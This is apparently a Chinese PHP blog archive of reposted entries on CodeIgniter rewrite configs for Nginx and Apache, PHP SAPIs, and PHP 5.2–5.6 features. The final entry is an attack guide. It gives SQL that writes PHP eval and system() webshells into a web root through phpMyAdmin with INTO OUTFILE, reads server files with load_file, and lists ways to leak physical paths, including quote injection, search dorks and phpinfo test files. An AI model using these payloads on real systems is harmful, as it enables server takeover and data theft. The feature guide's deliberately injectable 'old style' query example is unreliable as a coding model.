该从哪里开始

已经没有人选择PHP 5.2版本了,但这些事情已经发生了,但我不是说我写这篇博客来吐槽什么,更不是说给你一些升级的指南。通常他们使用的都是一些2006开始的主机空间,他们有一个“长期支持”的版本,来避免使用更新的版本,或者他们目前还没有升级的打算。又或者,理由真的很多。然而,好东西在新版的PHP等着您。

PHP 5.3 加入了很多有用的OOP特性!例如:匿名函数,SPL扩展不仅仅是迭代器,神话般的DateTime扩展都已经集成在PHP 5.3里面。还加入极其重要的E_DEPRECATED的错误报告标志。它会提醒您现在用的那些特性,将在下一版本无法使用。如果您已经在使用PHP 5.3,那么您往后的升级道路将会更加顺畅。如果您有线上程序运行在低版本,我不建议您升级。

PHP 5.4则进行了一系列的优化,它具有更快的执行效率和更少的内存占用。以下是基准测试的结果。

不管你使用使用到traits特性,PHP 5.4提高了程序性能,并降低了硬件成本。所以,我建议您使用开源软件的时候要保持升级。

PHP 5.5 还在测试当中,不适用于生产环境。自PHP 5.3之后,升级的风险和改动都会大大降低。

未来

说实话,未来是属于那些使用PHP5.4及以上的人。保持升级,定期跟踪语言的新特性和进展是我们日常工作的一部分。如果您已经落后了,那么我强烈建议您开始做升级计划,升级到一个比较新的版本。努力是值得的,毕竟程序是长年累月运行的。

CentOS 下用的是lnmp 的包配置Nginx 下的CI伪静态(搞爽了)

2016年5月27日 评论已被关闭

CentOS 下用的是lnmp 的包配置Nginx 下的CI伪静态(搞爽了)

http://www.cnblogs.com/jackluo/archive/2013/07/12/3185910.html

server
{
listen       80;
server_name cy.com;
index index.html index.htm index.php default.html default.htm default.php;
root  /home/wwwroot/cy;

location / {
if (-e $request_filename) {
break;
}
if (-f $request_filename) {
expires max;
break;
}
if (!-e $request_filename) {
rewrite ^/(.*)$ /index.php/$1 last;
}
}

#       include ci.conf;
location ~ .*\.(php|php5)?$
{
try_files $uri =404;
fastcgi_pass  unix:/tmp/php-cgi.sock;
fastcgi_index index.php;
include fcgi.conf;
}
location /index.php {
fastcgi_pass  unix:/tmp/php-cgi.sock;
fastcgi_param SCRIPT_FILENAME /home/wwwroot/cy/index.php;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
include fcgi.conf;
}
#       location ~ /index.php/ {
#               fastcgi_pass  unix:/tmp/php-cgi.sock;
#               fastcgi_index   index.php;
#               include fcgi.conf;
#       }
location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
{
expires      30d;
}

location ~ .*\.(js|css)?$
{
expires      12h;
}

access_log off;
}
复制代码
在Nginx下通过ci框架开发项目时,发现ci框架在nginx下是不能运行的,在网络上搜索了相关资料后可通过修改相关配置实现nginx支持PHP的ci框架。

1、修改ci框架的配置文件 config/config.php
修改$config[‘uri_protocol’]值
改为:

$config[‘uri_protocol’] = ‘PATH_INFO’;
2、修改nginx配置文件,在SERVER段中添加如下代码:

复制代码
location /index.php{
fastcgi_pass  unix:/tmp/php-cgi.sock;
fastcgi_param SCRIPT_FILENAME /home/wwwroot/index.php;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
include fcgi.conf;
}
复制代码
如果有多个应用,如:后台应用,可以多加一段以上代码,并修改相应入口文件:

复制代码
location /admin.php{
fastcgi_pass  unix:/tmp/php-cgi.sock;
fastcgi_param SCRIPT_FILENAME /home/wwwroot/admin.php;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
include fcgi.conf;
}
复制代码
第一次访问的时候,我是这么访问

http://cy.com/index.php/admin

我有一个admin 的目录

———————————

如果出现了 Access Denied

———————————————-

请检查

1、 php.ini(/etc/php5/cgi/php.ini)的配置中这两项
cgi.fix_pathinfo=1  (这个是自己添加的)

php5.6 CI的问题(Only variable references should be returned by reference)

2016年5月27日 评论已被关闭

php5.6 CI的问题(Only variable references should be returned by reference)
http://blog.sina.com.cn/s/blog_6718a8f40102vz05.html
A PHP Error was encountered
Severity: Notice
Message: Only variable references should be returned by reference
Filename: core/Common.php
Line Number: 257

原代码:
return $_config[0] =& $config;
修改后:
$_config[0] =& $config;
return $_config[0];

#CI

分类: PHP编程 标签:

CI 框架(Apache环境)有效删除URL中的index.php

2016年5月27日 评论已被关闭

CI 框架(Apache环境)有效删除URL中的index.php

http://www.xuebuyuan.com/2172044.html

http://codeigniter.org.cn/forums/thread-15444-1-1.html

index位于根目录时,你可以在index.php所在的根目录里新建.htaccess文件并使用以下代码:

RewriteEngine on
RewriteCond $1 !^(index\.php|robots\.txt)
RewriteRule ^(.*)$ /index.php?/$1 [L]

如果需要访问index.php同级目录下的js,css和images,需要在index.php所在的根目录里新建.htaccess文件并使用以下代码:

RewriteEngine On
RewriteCond $1 !^(index\.php|images|js|css|robots\.txt)
RewriteRule ^(.*)$ /index.php?/$1 [L]

当index.php不在根目录时,你可以在index.php所在目录里新建.htaccess文件并使用以下代码:

RewriteEngine on
RewriteCond $1 !^(index\.php|images|robots\.txt)
RewriteRule ^(.*)$ /path_to_app/index.php?/$1 [L]

注意把path_to_app换成你的index.php所在文件的目录.假设你的index.php放在根目录的tool子文件夹下,你可以这样写:

RewriteEngine on
RewriteCond $1 !^(index\.php|images|robots\.txt)
RewriteRule ^(.*)$ /tool/index.php?/$1 [L]

以上方法在使用facebook第三方登录的时候会无法访问到facebook php sdk的某些文件,需要将.htaccess文件全部重写成以下形式:

RewriteEngine on
RewriteRule !\.(js|ico|gif|jpg|png|css|swf|cab|rar|html|pdf|zip|xml|doc|tiff|deb|dmg|exe|tgz|flv|mp4|apk|pkg|mov)$ index.php [NC]


<IfModule mod_php5.c>
php_value upload_max_filesize  300M
php_value post_max_size        300M
php_value emax_file_uploads    300

php_value gc_maxlifetime  3600*24*30
</IfModule>
分类: PHP编程 标签:

PHP的ISAPI和FastCGI比较

2016年5月27日 评论已被关闭

PHP的ISAPI和FastCGI比较

http://www.cnblogs.com/huangye-dream/p/3560722.html

 1、CGI(通用网关接口/Common Gateway Interface)一般是可执行程序,例如EXE文件,和WEB服务器各自占据着不同的进程,而且一般一个CGI程序只能处理一个用户请求。这样,当用 户请求数量非常多时,会大量占用系统的资源,如内存、CPU时间等,造成效能低下。
    2、ISAPI(Internet Server Application Program Interface)是微软提供的一套面向WEB服务的API接口,它能实现CGI提供的全部功能,并在此基础上进行了扩展,如提供了过滤器应用程序接 口。ISAPI应用大多数以DLL动态库的形式使用,可以在被用户请求后执行,,在处理完一个用户请求后不会马上消失,而是继续驻留在内存中等待处理别的 用户输入。此外,ISAPI的DLL应用程序和WEB服务器处于同一个进程中,效率要显著高于CGI。
    3、FastCGI是可伸缩架构的CGI开放扩展,其主要行为是将CGI解释器进程保持在内存中并因此获得较高的性能。传统的CGI解释器的反复加载是 CGI性能低下的主要原因,如果CGI解释器保持在内存中并接受FastCGI进程管理器调度,则可以提供良好的性能、伸缩性等。
以 ISAPI 模式运行 PHP 的,这种方式最大的缺点就是稳定性不好,当 PHP 出错的时候,Apache进程也死掉。
FastCGI 模式运行 PHP 的优点:
首先就是 PHP 出错的时候不会搞垮 Apache,只是 PHP 自己的进程当掉(但 FastCGI 会立即重新启动一个新 PHP 进程来代替当掉的进程)。
其次 FastCGI 模式运行 PHP 比 ISAPI 模式性能更好
最后,就是可以同时运行 PHP5 和 PHP4
FastCGI 模式的一些缺点:
用 FastCGI 模式更适合生产环境的服务器,但对于开发用机器来说就不太合适。因为当使用 Zend Studio 调试程序时,由于 FastCGI 会认为 PHP 进程超时,从而在页面返回 500 错误。
    从版本 4.3.0 开始,PHP 提供了一种新类型的 SAPI(Server Application Programming Interface,服务端应用编程端口)支持,名为 CLI,意为 Command Line Interface,即命令行接口。顾名思义,该 SAPI 模块主要用作 PHP 的开发外壳应用。CLI SAPI 和其它 SAPI 模块相比有很多的不同之处。值得一提的是,CLI 和 CGI 是不同的 SAPI,尽管它们之间有很多共同的行为。
    CLI SAPI 最先是随 PHP 4.2.0 版本发布的,但仍旧只是一个实验性的版本,并需要在运行 ./configure 时加上 –enable-cli 参数。从 PHP 4.3.0 版本开始,CLI SAPI 成为了正式模块,–enable-cli 参数会被默认得设置为 on,也可以用参数 –disable-cli 来屏蔽。
    从 PHP 4.3.0开始,CLI/CGI 二进制执行文件的文件名、位置和是否存在会根据 PHP 在系统上的安装而不同。在默认情况下,当运行 make 时,CGI 和 CLI 都会被编译并且分别放置在 PHP 源文件目录的 sapi/cgi/php 和 sapi/cli/php 下。可以注意到两个文件都被命名为了 php。在 make install 的过程中会发生什么取决于配置行。如果在配置的时候选择了一个 SAPI 模块,如 apxs,或者使用了 –disable-cgi 参数,则在 make install 的过程中,CLI 将被拷贝到 {PREFIX}/bin/php,除非 CGI 已经被放置在了那个位置。因此,例如,如果在配置行中有 –with–apxs,则在 make install 的过程中,CLI 将被拷贝到 {PREFIX}/bin/php。如果希望撤销 CGI 执行文件的安装,请在 make install 之后运行 make install-cli。或者,也可以在配置行中加上 –disable-cgi 参数。
    以下为 CLI SAPI 和其它 SAPI 模块相比的显著区别:
    * 与 CGI SAPI 不同,其输出没有任何头信息。尽管 CGI SAPI 提供了取消 HTTP 头信息的方法,但在 CLI SAPI 中并不存在类似的方法以开启 HTTP 头信息的输出。CLI 默认以安静模式开始,但为了保证兼容性,-q 和 –no-header 参数为了向后兼容仍然保留,使得可以使用旧的 CGI 脚本。在运行时,不会把工作目录改为脚本的当前目录(可以使用 -C 和 –no-chdir 参数来兼容 CGI 模式)。出错时输出纯文本的错误信息(非 HTML 格式)。
    * CLI SAPI 强制覆盖了 php.ini 中的某些设置,因为这些设置在外壳环境下是没有意义的。

php的SAPI,CLI SAPI,CGI SAPI

2016年5月27日 评论已被关闭

php的SAPI,CLI SAPI,CGI SAPI
http://www.cnblogs.com/yjf512/p/3482040.html
首先一个问题:在命令行下执行:php -r ‘echo 12;’

控制台会打印出 12;

这个过程不是很奇妙么,我输入的是shell命令,但是执行的却是php脚本。php脚本执行完成之后的输出还能在控制台输出。

那在这个shell命令(控制台命令)和php中间一定有一种接口,能将shell的参数,代码,等转换成php,然后将php的输出转换成shell的输出。这个接口就叫做SAPI(Server Application Programimg Interface)。它就相当于PHP外部环境的代理器。

那么由于PHP可以应用在终端上,也可以应用在Web服务器中,所以呢,应用在终端上的SAPI就叫做CLI SAPI,应用在Web服务器中的就叫做CGI SAPI。在windows下安装php你会看到两个exe:php.exe和php-cgi.exe这个就对应的是这两种SAPI。再比如,在控制台上使用php -v,你就会发现PHP的版本信息中有个(cli)标示,就代表你这里的php应用程序使用的是cli SAPI。

关于CLI SAPI:手册上有很详细的说明:http://php.net/manual/zh/features.commandline.php

分类: PHP编程 标签:

PHP 5.2、5.3、5.4、5.5、5.6 对比以及功能详解

2016年5月27日 评论已被关闭

PHP 5.2、5.3、5.4、5.5、5.6 对比以及功能详解

http://www.open-open.com/lib/view/open1411614082000.html

截至目前(2014.2), PHP 的最新稳定版本是 PHP5.5, 但有差不多一半的用户仍在使用已经不在维护 [注] 的 PHP5.2, 其余的一半用户在使用 PHP5.3 [注].
因为 PHP 那“集百家之长”的蛋疼语法,加上社区氛围不好,很多人对新版本,新特征并无兴趣。
本文将会介绍自 PHP5.2 起,直至 PHP5.6 中增加的新特征。

  • PHP5.2 以前:autoload, PDO 和 MySQLi, 类型约束
  • PHP5.2:JSON 支持
  • PHP5.3:弃用的功能,匿名函数,新增魔术方法,命名空间,后期静态绑定,Heredoc 和 Nowdoc, const, 三元运算符,Phar
  • PHP5.4:Short Open Tag, 数组简写形式,Traits, 内置 Web 服务器,细节修改
  • PHP5.5:yield, list() 用于 foreach, 细节修改
  • PHP5.6: 常量增强,可变函数参数,命名空间增强

注:已于2011年1月停止支持: http://www.php.net/eol.php
注:http://w3techs.com/technologies/details/pl-php/5/all

PHP5.2以前

(2006前)
顺便介绍一下 PHP5.2 已经出现但值得介绍的特征。

autoload

大家可能都知道 __autoload() 函数,如果定义了该函数,那么当在代码中使用一个未定义的类的时候,该函数就会被调用,你可以在该函数中加载相应的类实现文件,如:

function __autoload($classname) { 
  require_once("{$classname}.php") ;
}

但该函数已经不被建议使用,原因是一个项目中仅能有一个这样的 __autoload() 函数,因为 PHP 不允许函数重名。但当你使用一些类库的时候,难免会出现多个 autoload 函数的需要,于是 spl_autoload_register() 取而代之:

spl_autoload_register(function($classname) { 
 require_once("{$classname}.php") 
});

spl_autoload_register() 会将一个函数注册到 autoload 函数列表中,当出现未定义的类的时候,SPL [注] 会按照注册的倒序逐个调用被注册的 autoload 函数,这意味着你可以使用 spl_autoload_register() 注册多个 autoload 函数.

注:SPL: Standard PHP Library, 标准 PHP 库, 被设计用来解决一些经典问题(如数据结构).

PDO 和 MySQLi

即 PHP Data Object, PHP 数据对象,这是 PHP 的新式数据库访问接口。

按照传统的风格,访问 MySQL 数据库应该是这样子:

// 连接到服务器,选择数据库
$conn = mysql_connect("localhost", "user", "password");
mysql_select_db("database"); // 执行 SQL 查询 
$type = $_POST['type'];
$sql = "SELECT * FROM `table` WHERE `type` = {$type}";
$result = mysql_query($sql); // 打印结果 
while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
    foreach($row as $k => $v) print "{$k}: {$v}\n";
} // 释放结果集,关闭连接 
mysql_free_result($result);
mysql_close($conn);

为了能够让代码实现数据库无关,即一段代码同时适用于多种数据库(例如以上代码仅仅适用于MySQL),PHP 官方设计了 PDO.
除此之外,PDO 还提供了更多功能,比如:

  • 面向对象风格的接口
  • SQL预编译(prepare), 占位符语法
  • 更高的执行效率,作为官方推荐,有特别的性能优化
  • 支持大部分SQL数据库,更换数据库无需改动代码

上面的代码用 PDO 实现将会是这样:

// 连接到数据库
$conn = new PDO("mysql:host=localhost;dbname=database", "user", "password"); // 预编译SQL, 绑定参数 
$query = $conn -> prepare("SELECT * FROM `table` WHERE `type` = :type");
$query -> bindParam("type", $_POST['type']); // 执行查询并打印结果 
foreach($query -> execute() as $row)
{
    foreach($row as $k => $v) print "{$k}: {$v}\n";
}

PDO 是官方推荐的,更为通用的数据库访问方式,如果你没有特殊需求,那么你最好学习和使用 PDO.
但如果你需要使用 MySQL 所特有的高级功能,那么你可能需要尝试一下 MySQLi, 因为 PDO 为了能够同时在多种数据库上使用,不会包含那些 MySQL 独有的功能。

MySQLi 是 MySQL 的增强接口,同时提供面向过程和面向对象接口,也是目前推荐的 MySQL 驱动,旧的C风格 MySQL 接口将会在今后被默认关闭。
MySQLi 的用法和以上两段代码相比,没有太多新概念,在此不再给出示例,可以参见 PHP 官网文档 [注]。

注:http://www.php.net/manual/en/mysqli.quickstart.php

类型约束

通过类型约束可以限制参数的类型,不过这一机制并不完善,目前仅适用于类和 callable(可执行类型) 以及 array(数组), 不适用于 string 和 int.

// 限制第一个参数为 MyClass, 第二个参数为可执行类型,第三个参数为数组
function MyFunction(MyClass $a, callable $b, array $c) // ...
{
}

PHP5.2

(2006-2011)

JSON 支持

包括 json_encode(), json_decode() 等函数,JSON 算是在 Web 领域非常常用的数据交换格式,可以被 JS 直接支持,JSON 实际上是 JS 语法的一部分。
JSON 系列函数,可以将 PHP 中的数组结构与 JSON 字符串进行转换:

$array = ["key" => "value", "array" => [1, 2, 3, 4]];
$json = json_encode($array);
echo "{$json}\n";
$object = json_decode($json);
print_r($object);

输出:

{"key":"value","array":[1,2,3,4]} stdClass Object ( [key] =&gt; value [array] =&gt; Array ( [0] =&gt; 1 [1] =&gt; 2 [2] =&gt; 3 [3] =&gt; 4 ) )

值得注意的是 json_decode() 默认会返回一个对象而非数组,如果需要返回数组需要将第二个参数设置为 true.

PHP5.3

(2009-2012)

PHP5.3 算是一个非常大的更新,新增了大量新特征,同时也做了一些不向下兼容的修改。

弃用的功能

以下几个功能被弃用,若在配置文件中启用,则 PHP 会在运行时发出警告。

Register Globals

这是 php.ini 中的一个选项(register_globals), 开启后会将所有表单变量($_GET和$_POST)注册为全局变量.
看下面的例子:

if(isAuth()) $authorized = true; if($authorized) include("page.php");

这段代码在通过验证时,将 $authorized 设置为 true. 然后根据 $authorized 的值来决定是否显示页面.

但由于并没有事先把 $authorized 初始化为 false, 当 register_globals 打开时,可能访问 /auth.php?authorized=1 来定义该变量值,绕过身份验证。

该特征属于历史遗留问题,在 PHP4.2 中被默认关闭,在 PHP5.4 中被移除。

Magic Quotes

对应 php.ini 中的选项 magic_quotes_gpc, 这个特征同样属于历史遗留问题,已经在 PHP5.4 中移除。

该特征会将所有用户输入进行转义,这看上去不错,在第一章我们提到过要对用户输入进行转义。
但是 PHP 并不知道哪些输入会进入 SQL , 哪些输入会进入 Shell, 哪些输入会被显示为 HTML, 所以很多时候这种转义会引起混乱。

Safe Mode

很多虚拟主机提供商使用 Safe Mode 来隔离多个用户,但 Safe Mode 存在诸多问题,例如某些扩展并不按照 Safe Mode 来进行权限控制。
PHP官方推荐使用操作系统的机制来进行权限隔离,让Web服务器以不同的用户权限来运行PHP解释器,请参见第一章中的最小权限原则.

匿名函数

也叫闭包(Closures), 经常被用来临时性地创建一个无名函数,用于回调函数等用途。

$func = function($arg) { print $arg; }; $func("Hello World");

以上代码定义了一个匿名函数,并赋值给了 $func.
可以看到定义匿名函数依旧使用 function 关键字,只不过省略了函数名,直接是参数列表。

然后我们又调用了 $func 所储存的匿名函数。

匿名函数还可以用 use 关键字来捕捉外部变量:

function arrayPlus($array, $num)
{
    array_walk($array, function(&amp;$v) use($num)
        {
            $v += $num; } 
        );
}

上面的代码定义了一个 arrayPlus() 函数(这不是匿名函数), 它会将一个数组($array)中的每一项,加上一个指定的数字($num).

在 arrayPlus() 的实现中,我们使用了 array_walk() 函数,它会为一个数组的每一项执行一个回调函数,即我们定义的匿名函数。
在匿名函数的参数列表后,我们用 use 关键字将匿名函数外的 $num 捕捉到了函数内,以便知道到底应该加上多少。

魔术方法:__invoke(), __callStatic()

PHP 的面向对象体系中,提供了若干“魔术方法”,用于实现类似其他语言中的“重载”,如在访问不存在的属性、方法时触发某个魔术方法。

随着匿名函数的加入,PHP 引入了一个新的魔术方法 __invoke().
该魔术方法会在将一个对象作为函数调用时被调用:

class A
{
    public function __invoke($str)
    {
        print "A::__invoke(): {$str}";
    } 
} 
$a = new A;
$a("Hello World");

输出毫无疑问是:

A::__invoke(): Hello World

__callStatic() 则会在调用一个不存在的静态方法时被调用。

命名空间

PHP的命名空间有着前无古人后无来者的无比蛋疼的语法:

&lt;?php // 命名空间的分隔符是反斜杠,该声明语句必须在文件第一行。 // 命名空间中可以包含任意代码,但只有 **类, 函数, 常量** 受命名空间影响。 namespace XXOO\Test; // 该类的完整限定名是 \XXOO\Test\A , 其中第一个反斜杠表示全局命名空间。 class A{} // 你还可以在已经文件中定义第二个命名空间,接下来的代码将都位于 \Other\Test2 . namespace Other\Test2; // 实例化来自其他命名空间的对象: $a = new \XXOO\Test\A; class B{} // 你还可以用花括号定义第三个命名空间 namespace Other { // 实例化来自子命名空间的对象: $b = new Test2\B; // 导入来自其他命名空间的名称,并重命名, // 注意只能导入类,不能用于函数和常量。 use \XXOO\Test\A as ClassA }

更多有关命名空间的语法介绍请参见官网 [注].

命名空间时常和 autoload 一同使用,用于自动加载类实现文件:

spl_autoload_register( function ($class) { spl_autoload(str_replace("\\", "/", $class)); } );

当你实例化一个类 \XXOO\Test\A 的时候,这个类的完整限定名会被传递给 autoload 函数,autoload 函数将类名中的命名空间分隔符(反斜杠)替换为斜杠,并包含对应文件。
这样可以实现类定义文件分级储存,按需自动加载。

注:http://www.php.net/manual/zh/language.namespaces.php

后期静态绑定

PHP 的 OPP 机制,具有继承和类似虚函数的功能,例如如下的代码:

class A
{
    public function callFuncXXOO()
    {
        print $this - &gt;
        funcXXOO();
    } 
    public function funcXXOO()
    {
        return "A::funcXXOO()";
    } 
} 
class B extends A
{
    public function funcXXOO()
    {
        return "B::funcXXOO";
    } 
} 
$b = new B;
$b ->callFuncXXOO();

输出是:

B::funcXXOO

可以看到,当在 A 中使用 $this->funcXXOO() 时,体现了“虚函数”的机制,实际调用的是 B::funcXXOO().
然而如果将所有函数都改为静态函数:

class A
{
    static public function callFuncXXOO()
    {
        print self :: funcXXOO();
    } 
    static public function funcXXOO()
    {
        return "A::funcXXOO()";
    } 
} 
class B extends A
{
    static public function funcXXOO()
    {
        return "B::funcXXOO";
    } 
} 
$b = new B;
$b - >callFuncXXOO();

情况就没这么乐观了,输出是:

A::funcXXOO()

这是因为 self 的语义本来就是“当前类”,所以 PHP5.3 给 static 关键字赋予了一个新功能:后期静态绑定:

class A { static public function callFuncXXOO() { print static::funcXXOO(); } // ... } // ...

这样就会像预期一样输出了:

B::funcXXOO

Heredoc 和 Nowdoc

PHP5.3 对 Heredoc 以及 Nowdoc 进行了一些改进,它们都用于在 PHP 代码中嵌入大段字符串。

Heredoc 的行为类似于一个双引号字符串:

$name = "MyName"; echo &lt;&lt;&lt; TEXT My name is "{$name}". TEXT;

Heredoc 以三个左尖括号开始,后面跟一个标识符(TEXT), 直到一个同样的顶格的标识符(不能缩进)结束。
就像双引号字符串一样,其中可以嵌入变量。

Heredoc 还可以用于函数参数,以及类成员初始化:

var_dump(&lt;&lt;&lt;EOD Hello World EOD ); class A { const xx = &lt;&lt;&lt; EOD Hello World EOD; public $oo = &lt;&lt;&lt; EOD Hello World EOD; }

Nowdoc 的行为像一个单引号字符串,不能在其中嵌入变量,和 Heredoc 唯一的区别就是,三个左尖括号后的标识符要以单引号括起来:

$name = "MyName"; echo &lt;&lt;&lt; 'TEXT' My name is "{$name}". TEXT;

输出:

My name is "{$name}".

用 const 定义常量

PHP5.3 起同时支持在全局命名空间和类中使用 const 定义常量。

旧式风格:

define("XOOO", "Value");

新式风格:

const XXOO = "Value";

const 形式仅适用于常量,不适用于运行时才能求值的表达式:

// 正确 const XXOO = 1234; // 错误 const XXOO = 2 * 617;

三元运算符简写形式

旧式风格:

echo $a ? $a : "No Value";

可简写成:

echo $a ?: "No Value";

即如果省略三元运算符的第二个部分,会默认用第一个部分代替。

Phar

Phar即PHP Archive, 起初只是Pear中的一个库而已,后来在PHP5.3被重新编写成C扩展并内置到 PHP 中。
Phar用来将多个 .php 脚本打包(也可以打包其他文件)成一个 .phar 的压缩文件(通常是ZIP格式)。
目的在于模仿 Java 的 .jar, 不对,目的是为了让发布PHP应用程序更加方便。同时还提供了数字签名验证等功能。

.phar 文件可以像 .php 文件一样,被PHP引擎解释执行,同时你还可以写出这样的代码来包含(require) .phar 中的代码:

require("xxoo.phar"); require("phar://xxoo.phar/xo/ox.php");

更多信息请参见官网 [注].

注:http://www.php.net/manual/zh/phar.using.intro.php

PHP5.4

(2012-2013)

Short Open Tag

Short Open Tag 自 PHP5.4 起总是可用。
在这里集中讲一下有关 PHP 起止标签的问题。即:

&lt;?php // Code... ?&gt;

通常就是上面的形式,除此之外还有一种简写形式:

&lt;? /* Code... */ ?&gt;

还可以把

&lt;?php echo $xxoo;?&gt;

简写成:

&lt;?= $xxoo;?&gt;

这种简写形式被称为 Short Open Tag, 在 PHP5.3 起被默认开启,在 PHP5.4 起总是可用。
使用这种简写形式在 HTML 中嵌入 PHP 变量将会非常方便。

对于纯 PHP 文件(如类实现文件), PHP 官方建议顶格写起始标记,同时 省略 结束标记。
这样可以确保整个 PHP 文件都是 PHP 代码,没有任何输出,否则当你包含该文件后,设置 Header 和 Cookie 时会遇到一些麻烦 [注].

注:Header 和 Cookie 必须在输出任何内容之前被发送。

数组简写形式

这是非常方便的一项特征!

// 原来的数组写法
$arr = array("key" => "value", "key2" => "value2"); // 简写形式 
$arr = ["key" => "value", "key2" => "value2"];

Traits

所谓Traits就是“构件”,是用来替代继承的一种机制。PHP中无法进行多重继承,但一个类可以包含多个Traits.

// Traits不能被单独实例化,只能被类所包含
trait SayWorld
{
    public function sayHello()
    {
        echo 'World!';
    } 
} 
class MyHelloWorld // 将SayWorld中的成员包含进来
{
    use SayWorld;
} 
$xxoo = new MyHelloWorld(); // sayHello() 函数是来自 SayWorld 构件的 
$xxoo->sayHello();

Traits还有很多神奇的功能,比如包含多个Traits, 解决冲突,修改访问权限,为函数设置别名等等。
Traits中也同样可以包含Traits. 篇幅有限不能逐个举例,详情参见官网 [注].

注:http://www.php.net/manual/zh/language.oop5.traits.php

内置 Web 服务器

PHP从5.4开始内置一个轻量级的Web服务器,不支持并发,定位是用于开发和调试环境。

在开发环境使用它的确非常方便。

php -S localhost:8000

这样就在当前目录建立起了一个Web服务器,你可以通过 http://localhost:8000/ 来访问。
其中localhost是监听的ip,8000是监听的端口,可以自行修改。

很多应用中,都会进行URL重写,所以PHP提供了一个设置路由脚本的功能:

php -S localhost:8000 index.php

这样一来,所有的请求都会由index.php来处理。

你还可以使用 XDebug 来进行断点调试。

细节修改

PHP5.4 新增了动态访问静态方法的方式:

$func = "funcXXOO"; A::{$func}();

新增在实例化时访问类成员的特征:

(new MyClass)-&gt;xxoo();

新增支持对函数返回数组的成员访问解析(这种写法在之前版本是会报错的):

print func()[0];

PHP5.5

(2013起)

yield

yield关键字用于当函数需要返回一个迭代器的时候, 逐个返回值。

function number10() { for($i = 1; $i &lt;= 10; $i += 1) yield $i; }

该函数的返回值是一个数组:

[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

list() 用于 foreach

可以用 list() 在 foreach 中解析嵌套的数组:

$array = [ [1, 2, 3], [4, 5, 6], ];
foreach ($array as list($a, $b, $c)) echo "{$a} {$b} {$c}\n";

结果:

1 2 3 4 5 6

细节修改

不推荐使用 mysql 函数,推荐使用 PDO 或 MySQLi, 参见前文。
不再支持Windows XP.

可用 MyClass::class 取到一个类的完整限定名(包括命名空间)。

empty() 支持表达式作为参数。

try-catch 结构新增 finally 块。

PHP5.6

更好的常量

定义常量时允许使用之前定义的常量进行计算:

const A = 2;
const B = A + 1;
class C
{
    const STR = "hello";
    const STR2 = self :: STR + ", world";
}

允许常量作为函数参数默认值:

function func($arg = C::STR2)

更好的可变函数参数

用于代替 func_get_args()

function add(...$args)
{
    $result = 0;
    foreach($args as $arg) $result += $arg;
    return $result;
}

同时可以在调用函数时,把数组展开为函数参数:

$arr = [2, 3]; add(1, ...$arr); // 结果为 6

命名空间

命名空间支持常量和函数:

namespace Name\Space
{
    const FOO = 42;
    function f()
    {
        echo __FUNCTION__ . "\n";
    } 
} 
namespace
{
    use const Name\Space\FOO;
    use function Name\Space\f;
    echo FOO . "\n";
    f();
}
分类: PHP编程 标签:

在phpmyadmin后台获取webshell方法汇总整理

2016年5月22日 评论已被关闭

在phpmyadmin后台获取webshell方法汇总整理

http://blog.csdn.net/lizhengnanhua/article/details/38451699

方法一:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES (‘<?php @eval($_POST[xiaoma])?>’);
SELECT xiaomaFROM study INTO OUTFILE ‘E:/wamp/www/7.php’;
—-以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
一句话连接密码:xiaoma

方法二:
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES(‘<?php eval($_POST[xiaoma])?>’);
select xiaoma1 from xiaoma into outfile ‘E:/wamp/www/7.php’;
Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容:    select load_file(‘E:/xamp/www/s.php’);

写一句话:select ‘<?php @eval($_POST[cmd])?>’INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

cmd执行权限:select ‘<?php echo \'<pre>\’;system($_GET[\’cmd\’]); echo \'</pre>\’; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

方法四:
select load_file(‘E:/xamp/www/xiaoma.php’);

select ‘<?php echo \'<pre>\’;system($_GET[\’cmd\’]); echo \'</pre>\’; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir

php爆路径方法收集 :

1、单引号爆路径
说明:
直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。
www.xxx.com/news.php?id=149′

2、错误参数值爆路径
说明:
将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。
www.xxx.com/researcharchive.php?id=-1

3、Google爆路径
说明:
结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.tw warning
Site:xxx.com.tw “fatal error”

4、测试文件爆路径
说明:
很多网站的根目录下都存在测试文件,脚本代码通常都是phpinfo()。
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php

5、phpmyadmin爆路径
说明:
一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。至于phpmyadmin的地址可以用wwwscan这类的工具去扫,也可以选择google。PS:有些BT网站会写成phpMyAdmin。
1. /phpmyadmin/libraries/lect_lang.lib.php
2./phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4. load_file()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php

6、配置文件找路径
说明:
如果注入点有文件读取权限,就可以手工load_file或工具读取配置文件,再从中寻找路径信息(一般在文件末尾)。各平台下Web服务器和PHP的配置文件默认路径可以上网查,这里列举常见的几个。

